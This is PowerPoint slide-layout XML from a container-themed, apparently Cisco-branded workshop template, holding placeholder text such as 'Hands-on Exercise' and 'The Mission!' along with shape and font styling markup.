            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475DBA01-A720-5249-92E7-6CD20F43871E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BFE694-CB85-C949-90B8-23D1502D0A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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9370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DNA Mission Brea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A6F419-F710-FA43-8CAB-B4E1F64DE05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B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCF34CE-2DE1-FF41-896D-B3AE883AA20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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A736EB88-8AEA-FD4A-B99F-FBF9132B9E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90EB5A3-2F34-6549-82A8-0A0C2F4EC495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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72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5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308012" y="240631"/>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a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C2E2AF7-E5ED-E641-AE6D-596FBE296E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0"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7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85DA840-F527-EB43-9E9F-833087EAF0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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89544367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NA Mission Brea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A6F419-F710-FA43-8CAB-B4E1F64DE05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B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCF34CE-2DE1-FF41-896D-B3AE883AA20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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F5E16A-FE9A-BF48-82F5-37C715B12708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04385922-5475-094F-9F97-8FF196EC427E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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6619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CC Mission Brea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85D8A5-BEA8-B048-B62D-A3F9AD8EB32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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C1B048-465C-4442-B509-10E275175B9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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DEDB633-A1FF-7F4B-A878-34195CDBC71A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E53DEB9B-42CD-A146-A7D8-61B35C1EC108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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05345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C Mission Brea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85D8A5-BEA8-B048-B62D-A3F9AD8EB32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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359C5C59-6138-724F-B9E0-D0012D741103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98714426-CE39-E844-A586-4769F10EA22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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C1B048-465C-4442-B509-10E275175B9B}"/>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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1797E92-5125-EF40-8EF0-150B9A4EA100}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FAD7406-5BA6-954A-B3D2-A570C59105CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="1823225"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3400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60">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="7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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287923" y="1540552"/>
            <a:ext cx="7972248" cy="2278837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="183596" indent="-399958" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="1" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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13137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60">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="22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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287923" y="1540552"/>
            <a:ext cx="7972248" cy="2278837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="183596" indent="-399958" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="1" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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5024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p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500064" y="3911436"/>
            <a:ext cx="8139112" cy="525016"/>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bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97174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2"/>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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448786" y="3054518"/>
            <a:ext cx="8364236" cy="560153"/>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a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282715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81297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1"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5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3466792"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2018  Cisco and/or its affiliates. All rights reserved.   Cisco Public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308012" y="240632"/>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18843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594" indent="-171446">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189" indent="-165096">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783" indent="-109535">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="911012" indent="-171411">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
